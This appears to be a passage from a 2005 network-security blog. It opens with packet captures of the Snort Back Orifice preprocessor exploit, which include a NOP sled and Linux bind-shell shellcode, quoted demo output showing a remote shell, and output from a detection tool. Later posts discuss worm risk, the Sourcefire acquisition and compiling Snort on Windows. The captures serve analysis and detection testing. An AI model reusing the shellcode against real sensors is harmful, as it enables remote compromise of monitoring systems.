        0x04d0:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x04e0:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x04f0:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x0500:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x0510:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x0520:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x0530:  9090 9090 9090 9090 9090 9090 9090 31db  ..............1.
        0x0540:  5343 536a 026a 6658 9989 e1cd 8096 4352  SCSj.jfX......CR
        0x0550:  6668 7a69 6653 89e1 6a66 5850 5156 89e1  fhzifS..jfXPQV..
        0x0560:  cd80 b066 d1e3 cd80 5252 5643 89e1 b066  ...f....RRVC...f
        0x0570:  cd80 936a 0259 b03f cd80 4979 f9b0 0b52  ...j.Y.?..Iy...R
        0x0580:  682f 2f73 6868 2f62 696e 89e3 5253 89e1  h//shh/bin..RS..
        0x0590:  cd80 0000                                ....
09:30:49.654205 IP 192.168.2.5.55465 > 66.93.110.10.53:  52835 updateD ServFail [5863q][|domain]
        0x0000:  4500 0594 0be4 0000 4011 f660 c0a8 0205  E.......@..`....
        0x0010:  425d 6e0a d8a9 0035 0580 8ec2 ce63 d1d2  B]n....5.....c..
        0x0020:  16e7 13cf 1fa1 a586 4d8a b466 aaa2 c875  ........M..f...u
        0x0030:  2309 78b2 e0d4 ef49 8a8e 39e5 aa8a 4d0d  #.x....I..9...M.
        0x0040:  22b5 3751 6ec9 9763 29e3 8469 f317 7430  ".7Qn..c)..i..t0
        0x0050:  f162 20c3 d501 a47b c0a0 c559 a5d5 96b2  .b.....{...Y....
        0x0060:  b04f fc0b 6749 d086 70c3 e65b 93f2 8c0a  .O..gI..p..[....
        0x0070:  0197 140f 95ce 3598 3a88 2fb3 cdbb ae2b  ......5.:./....+
        0x0080:  0458 7135 0f1e 8b06 be6d 2aa8 84bd 56ec  .Xq5.....m*...V.
        0x0090:  da50 3ca1 a785 0b46 be2e bf3c a9a5 dd80  .P<....F...<....
        0x00a0:  855a de98 ed70 cf8c 3cc9 b7f7 8ddf 3b7d  .Z...p..<.....;}
        0x00b0:  0595 ffbf f38d 4e6d 769b 7c1c c159 6a58  ......Nmv.|..YjX
        0x00c0:  3b5c 6a7b 8aa8 43df f0c0 9710 36a0 0306  ;\j{..C.....6...
        0x00d0:  e92e 8752 824e a6b6 4a75 d07a bdc1 9e1c  ...R.N..Ju.z....
        0x00e0:  ce27 bee7 6c6c d148 c458 303d a7a8 d68e  .'..ll.H.X0=....
        0x00f0:  6e43 7a81 5a50 fb69 81a6 e17e c6a3 c293  nCz.ZP.i...~....
        0x0100:  a7e1 a244 3d06 ffce 003a ac84 c95f 1bbf  ...D=....:..._..
        0x0110:  bcbc a1d5 86bb d48d 0374 5852 c349 1b46  .........tXR.I.F
        0x0120:  ad73 deb9 25fc b51a 8a4f b14d 03cd bbfe  .s..%....O.M....
        0x0130:  9c22 a315 eb17 1bab f848 1d1b 3c39 143c  .".......H..<9.<
        0x0140:  e965 5a0e 0a78 bd94 6cde 07a1 feda 7f15  .eZ..x..l.......
        0x0150:  35db aa6a 13ac 966a 096b 98e4 7a9d 94be  5..j...j.k..z...
        0x0160:  6100 7dcd 76e0 dee3 ae4e 78a8 e16e 0c8c  a.}.v....Nx..n..
        0x0170:  6f70 1c5b 2522 ee93 bca4 1132 04fc 4294  op.[%".....2..B.
        0x0180:  3f0a 901b b0fe dfef 76e9 ca89 b472 6d4a  ?.......v....rmJ
        0x0190:  b3ca e2b1 09c1 2a6d bcfa afd0 a2bd 2745  ......*m......'E
        0x01a0:  2b6d dbc3 41d9 6941 6e96 a76d 9fcc 49f8  +m..A.iAn..m..I.
        0x01b0:  880f a4b4 2812 1401 0e17 1be4 dc2a ebd9  ....(........*..
        0x01c0:  8b0f 864b 10f9 8481 1dfc 559b 2b45 67fd  ...K......U.+Eg.
        0x01d0:  7609 8a6b 093b 32f7 1ce2 3df6 fbea 7699  v..k.;2...=...v.
        0x01e0:  49fa 39db 25a6 f877 0c05 ddfc 3f26 b002  I.9.%..w....?&..
        0x01f0:  06be fc5f 55a6 4db6 6d83 7dd0 8645 2f2d  ..._U.M.m.}..E/-
        0x0200:  6dd4 db5c 6988 2c69 a2f8 86d7 e3f5 8cef  m..\i.,i........
        0x0210:  bfd8 e157 5219 6de6 6ac2 02b7 46a3 409d  ...WR.m.j...F.@.
        0x0220:  1d87 d616 42e7 4962 c75d fa55 00dc 234b  ....B.Ib.].U..#K
        0x0230:  295e e29c 8a9e 5a91 1a87 76d5 a26c 4f0f  )^....Z...v..lO.
        0x0240:  035a 7030 5b2b 18e8 833c 1f9e 1d41 3ddf  .Zp0[+...<...A=.
        0x0250:  ad38 2755 c4bb 9cfc 25da bf52 2208 258e  .8'U....%..R".%.
        0x0260:  86d5 f2d2 f9dc 1fa3 ff7d 5ed9 62ce 4112  .........}^.b.A.
        0x0270:  512e 188b 69da 1af2 1343 2656 4ee0 8aa0  Q...i....C&VN...
        0x0280:  8fe0 8406 a602 265d e2e9 ff0e d8ca 788d  ......&]......x.
        0x0290:  c068 bda6 0042 9d19 6d0a 53e8 af7a 46ed  .h...B..m.S..zF.
        0x02a0:  25a3 ad51 2966 577b b5a6 2aa6 85bd 2a57  %..Q)fW{..*...*W
        0x02b0:  7fae 7dad 31bb cd19 ba18 0e90 ccff 203e  ..}.1..........>
        0x02c0:  70e6 b67e ea4e 18a8 1e9d 67a9 74ae 9fb9  p..~.N....g.t...
        0x02d0:  38e8 82c9 252c d29b 8313 1e17 2df8 e1fb  8...%,......-...
        0x02e0:  38b1 88d3 9223 53c9 2776 fd5f aa67 3f7a  8....#S.'v._.g?z
        0x02f0:  121e 7221 c37f 1427 2ee4 4ca5 7bab 71cb  ..r!...'..L.{.q.
        0x0300:  868c c978 484e ae69 383a f58e 312f f223  ...xHN.i8:..1/.#
        0x0310:  16f8 36fe 93bb 7aa4 a5d4 41a1 fdc2 58b7  ..6...z...A...X.
        0x0320:  a1df a196 1455 522e f8af b7c1 306e 7fbc  .....UR.....0n..
        0x0330:  2a7e 3527 dd49 adbb 1049 2334 5b83 7ee7  *~5'.I...I#4[.~.
        0x0340:  9232 7a55 1f42 86c0 6e1f 6b1e 508d 8f6c  .2zU.B..n.k.P..l
        0x0350:  b899 b925 2acf d5d3 358d 5a25 1e78 8b61  ...%*...5.Z%.x.a
        0x0360:  1f6e 5bdc 10fc 94c8 e511 b96d 1712 2a5c  .n[........m..* 
        0x0370:  480f e81f 41b6 5ab5 3e67 f01d ada8 86d0  H...A.Z.>g......
        0x0380:  72d9 8b54 4f6a c2ee 426c 6858 ef06 18d3  r..TOj..BlhX....
        0x0390:  4009 4bfe 8a06 04e8 32de 2bc3 f0fa 389a  @.K.....2.+...8.
        0x03a0:  93fd b3c4 a576 59f9 8f7a 2284 a051 c09a  .....vY..z"..Q..
        0x03b0:  8a70 0aea 8e87 fa75 1a9c b4a0 1078 0968  .p.....u.....x.h
        0x03c0:  68c0 bbb5 9807 a152 f4a2 0d9c b1fc 4c58  h......R......LX
        0x03d0:  2ecb 6d4a f482 8684 fd88 73dc b489 2121  ..mJ......s...!!
        0x03e0:  5b4c eacf 73e5 c2a0 372c 9145 4a6d 62b6  [L..s...7,.EJmb.
        0x03f0:  5261 dc27 e57d ce3c c3ca d05e 44f5 274e  Ra.'.}.<...^D.'N
        0x0400:  1467 cab9 db78 63cc 62e0 b80a 734e cb5c  .g...xc.b...sN.  
        0x0410:  a01c 5ea8 4782 9bc6 d52a 134e 88a4 e5b6  ..^.G....*.N....
        0x0420:  b91b 813b 5a1c edcf 5da6 c911 55e5 4ff1  ...;Z...]...U.O.
        0x0430:  9f77 ffa4 0577 7529 d9b0 6336 e97e 21a2  .w...wu)..c6.~!.
        0x0440:  54ef 789e 77bd 491c 2ef1 71b6 0f90 9090  T.x.w.I...q.....
        0x0450:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x0460:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x0470:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x0480:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x0490:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x04a0:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x04b0:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x04c0:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x04d0:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x04e0:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x04f0:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x0500:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x0510:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x0520:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x0530:  9090 9090 9090 9090 9090 9090 9090 31db  ..............1.
        0x0540:  5343 536a 026a 6658 9989 e1cd 8096 4352  SCSj.jfX......CR
        0x0550:  6668 7a69 6653 89e1 6a66 5850 5156 89e1  fhzifS..jfXPQV..
        0x0560:  cd80 b066 d1e3 cd80 5252 5643 89e1 b066  ...f....RRVC...f
        0x0570:  cd80 936a 0259 b03f cd80 4979 f9b0 0b52  ...j.Y.?..Iy...R
        0x0580:  682f 2f73 6868 2f62 696e 89e3 5253 89e1  h//shh/bin..RS..
        0x0590:  cd80 0000                                ....

I ran this traffic by a local sensor running Snort 2.3.3 on FreeBSD 5.4 and it continued to function. There was no DoS or exploit. RD's exploit as written targets Linux. His demo exploits a 2.6 kernel:

 * $ ./snortbo 192.168.0.101 1
 * Snort BackOrifice PING exploit (version 0.3)
 * by rd@thc.org
 *
 * Selected target:
 *   1 | manual testing gcc with -O0
 *   
 * Sending exploit to 192.168.0.101
 * Done.
 *
 * $ nc 192.168.0.101 31337
 * id
 * uid=104(snort) gid=409(snort) groups=409(snort)
 * uname -sr
 * Linux 2.6.11-hardened-r1

Kyle Haugsness wrote a tool and rules to detect the Snort BO exploit which you might find useful. By following the directions in the code I got it to work on FreeBSD 5.4:

orr:/home/richard$ gcc -Wall -lpcap -o ident-snort-bo-exploit ident-snort-bo-exploit.c
orr:/home/richard$ sudo ./ident-snort-bo-exploit
# Using interface: fxp0
# Using alert output file: stdout
# Using pcap output file:  snort-bo-exploit-2005-10-25-09:46:54.cap
#
##############################################
#
# Detected exploit attempt! (details below)
# Note that shellcode should start after 9th
# byte into the payload below (the 8 byte
# magic value has been removed and the
# remainder of the header is 9 bytes).
#
##############################################
#
# Date/time:    Tue Oct 25 09:47:21 2005
# Source IP:    192.168.2.5
# Dest   IP:    66.93.110.10
# Source port:  64544
# Dest   port:  53
# UDP data len: 1400
# BO key (dec): 31337
# BO key (hex): 0x7A69
# BO data len:  -18 (UDP len - 17 byte BO header)
# BO pkt id:    -1
# BO pkt type:  0x01 (0x01 = PING)
#
# Decrypted BO data:
#
0x0000:  FF FF FF FF FF FF FF FF  01 90 90 90 90 90 90 90  ................
0x0010:  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  ................
0x0020:  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  ................
...edited...
0x0550:  3D AA E7 D7 80 CA 0F 07  36 14 2A 0C 65 08 05 8C  =.......6.*.e...
0x0560:  EE 97 25 0C 0F 90 66 06  2B 5B E2 3C CE E9 14 4B  ..%...f.+[.<...K
0x0570:  00 00 00 00 00 00 00 00                          ........
#
# Decoded packet num: 1;  Exploit: yes;  Timestamp: Tue Oct 25 09:47:21 2005

On a related note, I saw Tom Ptacek comment on my earlier post. Tom says:

"There is nothing wrong with looking for vulnerabilities in your competitor's products, and Neel Mehta has built enough of a rep for himself that he doesn't need to take 'marching orders' from anybody."

I agree there is nothing wrong with looking for vulnerabilities in your competitor's products. However, are we supposed to believe that Neel Mehta, an ISS X-Force researcher, developed this exploit on his own? Are we supposed to think he did not do this at the direction of his employer, who published an advisory? If Neel discovered this vulnerability on his own, and not while working for ISS, why did Sourcefire learn of the vulnerability from US-CERT and not Neel himself?

Read More

The Coming Snort Worm

This week we learned via an advisory of a vulnerability in the Back Orifice preprocessor in Snort version 2.4.2, 2.4.1, and 2.4.0. The vulnerability was discovered by another ISS X-Force researcher. I bet (but have no inside knowledge) that he was following the same marching orders that Mike Lynn received: find vulnerabilities in competitors' products. Mike looked at Cisco, and Neel Mehta looked at Sourcefire's Snort.

I am sure ISS is still bitter over the Witty worm that revealed the installed ISS RealSecure and BlackIce userbase to be about 12,000 systems. The Witty worm spread via a single UDP packet with a fixed source port of 4000 UDP.

Let's consider the factors that lead me to believe that the Snort BO vulnerability will produce a worm.

1. The new vulnerability can be exploited by a specially crafted UDP packet to or from any port other than port 31337. (Thanks to Jose Nazario for correcting me on this point.) This is similar to the UDP packet used by Witty. UDP is an ideal worm vector, as demonstrated by Slammer. There is no need for a TCP handshake, which means spoofing is much easier.


2. Sensors need not be directly targeted. All a worm has to do is send exploit UDP traffic to a segment monitored by a vulnerable Snort sensor. The attacker need not know anything about the target's management IP address.


3. Snort has been in the news recently as a result of its acquisition by Checkpoint. A worm coder can kill or embarrass two birds with one UDP stone.


4. Snort is everywhere -- .com, .net, .org, .edu, .gov, etc. 0wning a .mil or .gov Snort sensor gives intruders the ultimate vantage point over a monitored network. I imagine sophisticated intruders have already compromised a slew of sensitive Snort sensors, but at some point a lower life form will decide to turn the exploit into a worm.


5. Snort source code is available, so comparing 2.4.0-2.4.2 with 2.4.3 means the vulnerability can be quickly identified.

I can imagine a few factors that will reduce the likelihood of a worm.

1. The vulnerability reportedly exists in Snort versions 2.4.0 through 2.4.2. That's a narrow set of versions, given Snort 2.4.0 was released in July. I have heard of users running Snort 1.8.x and 1.9.x; they complain about rules that don't work with their versions. Argh!


2. Snort runs on a huge number of platforms. That is one of the beauties of the program. Will a worm target Snort on Linux? If so, what distro/kernel/version/etc.? How about Snort on Windows? That would make the most sense -- the OS would be fairly similar, and the user base would make for good targets. We'll see.


3. Sophisticated intruders will keep any exploit to themselves. They may try to keep it out of the hands of the bottom feeders.

What do you think? Will we see a Snort worm? I'm keeping an eye on FrSIRT.

On a related note, be sure to upgrade to Ethereal 0.10.13 -- 0.10.12 has bugs too.

Read More

Bejtlich Quotes in Sourcefire Acquisition Story

Eric B. Parizo mentioned me in his story Snort users fear future under Check Point. One of the quotes appears as follows:

Richard Bejtlich, principal with Washington, D.C.-based consultancy Tao Security, said many fail to realize just how expensive it is to support a product like Snort.

"I've been to Sourcefire, and I've seen how many people they have working on the product and on signatures," Bejtlich said. "They have what seems like millions and millions of racks of equipment. I was surprised they were able to continue with Snort as they did."

That should say "millions and millions of dollars of racks of equipment." I obviously haven't seen millions of racks of anything when I visit Sourcefire!

Also, I appear to have been demoted at my own company. I am not a "principle" at TaoSecurity. My boss must be upset with my performance! :)

Read More

Thoughts on the Week's Security News

This was a busy week for me; I spent all week teaching (and all last week preparing) a private Network Security Operations class in California. I just flew back from LAX to Dulles this morning and I get on another plane tomorrow afternoon. I'm speaking in San Jose at a Cisco event, and then teaching a second private NSO class again next week.

I've been tracking all of the week's security news. Thank you to those who thought I may have missed something. I didn't want to commit any thoughts to the blog without taking some time to ponder various events. Obviously the biggest news of the week was Checkpoint's $225 million acquisition of Sourcefire.

In short, I didn't see that coming. I have doubts about the future of Snort being a free product, let alone open source. I don't see anyone making the case to the board of a publicly traded company that part of that company's work is going to be given away for free, especially after spending $225 million for it.

You may have seen how Checkpoint is treating users of the free version of Zonealarm, which was purchased by Checkpoint two years ago for $225 million. Sure, the basic Zonealarm firewall is still free, but Checkpoint will not provide a patch for a new security problem. Checkpoint claims the problem has low severity even though proof of concept code exists. To quote John LaCour, director of security services: "It is a theoretical attack that we don't see used in the real world." Great. That rationale has certainly stood the test of time (not).

However, I do not fault Sourcefire at all for being purchased. I never faulted them for the way they handled the new rules licensing, either. The amount of manpower and resources they devote to Snort is incredible, so I am happy to see them be rewarded. I am just not sure Checkpoint is the right fit, at least from where I stand. What are your thoughts?

Read More

John Ward Compiles Snort on Windows

Newsflash: compiling Snort on Windows is not the chore some people believe it to be. After reading my flailing attempt to use a beta Visual Studio to compile Snort 2.4.1 from source on my Windows 2000 laptop, John Ward stepped in and got the job done. John's a professionall programmer, but anyone who uses his approach will have the same results. Thanks for stepping up to the plate!

Read More

Compiling Snort on Windows

Many of you have undoubtedly read the snort-users thread where some people complain about not having Snort in compiled form as soon as Sourcefire releases Snort in source code form. Sourcefire released Snort 2.4.1, a vulnerability bug fix, on Friday. They only released an updated snort-2.4.1.tar.gz archive. There were no Linux RPMs or Win32 installation packages.

I decided to learn what was involved with compiling Snort on Windows. Right now I will say I did not finish the job. I am not a Windows programmer. I do not use Windows as a software development platform. Today was the first day I used the tools I describe below. The purpose of this post is to demonstrate that compiling Snort on Windows is not rocket science.

First, notice the snort-2.4.1.tar.gz archive has a src\win32 directory with these contents:

Makefile.in
WIN32-Code
WIN32-Includes
WIN32-Prj
WIN32-Libraries
Makefile.am

This looks promising. Let's see the contents of the WIN32-Prj directory.

snort_installer.nsi
build_releases.bat
snort_installer_options.ini
snort.dsw
snort.dsp
pcre.dll
LibnetNT.dll
snort.mak
snort.dep

snort.dsp is a Visual C++ project file. I don't have Visual C++ on my Windows 2000 laptop. A visit to MSDN shows Visual C++ Express Edition Beta 2 is free for download. I retrieve and install the program. After agreeing to convert Sourcefire's Visual C++ 6 files into a newer format, I am ready to try to "Build" Snort.

Along the way I read an error about a missing executable called mc. David Bianco in #snort-gui hypothesizes that mc means message compiler, a program available in the Windows® Server 2003 SP1 Platform SDK. Since the SDK works fine on Windows 2000, I install it. I also edit my system's environment variables so Windows knows where to find mc.exe in the future.

Once Visual Studio knows how to find mc.exe, it begins complaining about finding header files found in the C:\Program Files\Microsoft Platform SDK\Include directory like winsock2.h. Remember, I have never used Visual Studio before, and I have read no documentation. I figure the easiest way forward is to just copy the contents of the C:\Program Files\Microsoft Platform SDK\Include directory into the src\win32\WIN32-Includes directory. That problem is solved.

My next hurdle involves providing Snort with the WinPcap headers it needs. I retrieve WinPcap 3.0 in source code format since my test system uses WinPcap 3.0. Should I get Snort to compile I figure it should have the same version of WinPcap as installed on the laptop. I use the same *.h file copy trick to copy the contents of \winpcap\wpcap\libpcap\Win32\Include to src\win32\WIN32-Includes. I do the same for \winpcap\wpcap\libpcap\ .h files.

At this point I run into a problem caused by the Visual Studio project's insistence on building a version of Snort with database support. I figure the easiest once to build is a "release" version for MySQL (as opposed to a "debug" version).

During the build I see an error about mysql_time.h not being found. I download the Windows source for MySQL 4.0.26 only to find mysql_time.h is not in the mysql-4.0.26\include directory. I then download 5.0.12-BETA and see mysql-5.0.12-beta\include has mysql_time.h, just as I needed.

After taking care of relating library file locations, I had everything I needed to progress to the linking stage. Unfortunately, this was where my build process ended with the following errors:

Linking...
util.obj : error LNK2019: unresolved external symbol __imp__DeregisterEventSource@4 referenced in function _CreateApplicationEventLogEntry
syslog.obj : error LNK2001: unresolved external symbol __imp__DeregisterEventSource@4
util.obj : error LNK2019: unresolved external symbol __imp__ReportEventA@36 referenced in function _CreateApplicationEventLogEntry
syslog.obj : error LNK2001: unresolved external symbol __imp__ReportEventA@36
util.obj : error LNK2019: unresolved external symbol __imp__RegisterEventSourceA@8 referenced in function _CreateApplicationEventLogEntry
syslog.obj : error LNK2001: unresolved external symbol __imp__RegisterEventSourceA@8
misc.obj : error LNK2019: unresolved external symbol __imp__IsTextUnicode@12 referenced in function _print_interface
syslog.obj : error LNK2019: unresolved external symbol __imp__RegCloseKey@4 referenced in function _AddEventSource
win32_service.obj : error LNK2001: unresolved external symbol __imp__RegCloseKey@4
mysqlclient.lib(my_init.obj) : error LNK2001: unresolved external symbol __imp__RegCloseKey@4
syslog.obj : error LNK2019: unresolved external symbol __imp__RegSetValueExA@24 referenced in function _AddEventSource
win32_service.obj : error LNK2001: unresolved external symbol __imp__RegSetValueExA@24
syslog.obj : error LNK2019: unresolved external symbol __imp__RegCreateKeyA@12 referenced in function _AddEventSource
win32_service.obj : error LNK2019: unresolved external symbol __imp__RegQueryValueExA@24 referenced in function _ReadServiceCommandLineParams
win32_service.obj : error LNK2019: unresolved external symbol __imp__RegOpenKeyExA@20 referenced in function _ReadServiceCommandLineParams
mysqlclient.lib(my_init.obj) : error LNK2001: unresolved external symbol __imp__RegOpenKeyExA@20
win32_service.obj : error LNK2019: unresolved external symbol __imp__SetServiceStatus@8 referenced in function _SnortServiceCtrlHandler@4
win32_service.obj : error LNK2019: unresolved external symbol __imp__CloseServiceHandle@4 referenced in function _InstallSnortService
win32_service.obj : error LNK2019: unresolved external symbol __imp__CreateServiceA@52 referenced in function _InstallSnortService
win32_service.obj : error LNK2019: unresolved external symbol __imp__OpenSCManagerA@12 referenced in function _InstallSnortService
win32_service.obj : error LNK2019: unresolved external symbol __imp__RegCreateKeyExA@36 referenced in function _InstallSnortService
win32_service.obj : error LNK2019: unresolved external symbol __imp__DeleteService@4 referenced in function _UninstallSnortService
win32_service.obj : error LNK2019: unresolved external symbol __imp__OpenServiceA@12 referenced in function _UninstallSnortService
win32_service.obj : error LNK2019: unresolved external symbol __imp__RegDeleteKeyA@8 referenced in function _UninstallSnortService
win32_service.obj : error LNK2019: unresolved external symbol __imp__RegisterServiceCtrlHandlerA@8 referenced in function _SnortServiceStart@8
win32_service.obj : error LNK2019: unresolved external symbol __imp__StartServiceCtrlDispatcherA@4 referenced in function _SnortServiceMain
mysqlclient.lib(my_init.obj) : error LNK2019: unresolved external symbol __imp__RegEnumValueA@32 referenced in function _my_win_init
.\snort___Win32_MySQL_Release/snort.exe : fatal error LNK1120: 20 unresolved externals

I do not know how to fix these unresolved external symbols. Does anyone have any ideas?

At this point, I do not think I've done too badly for someone with zero Windows development experience!

Read More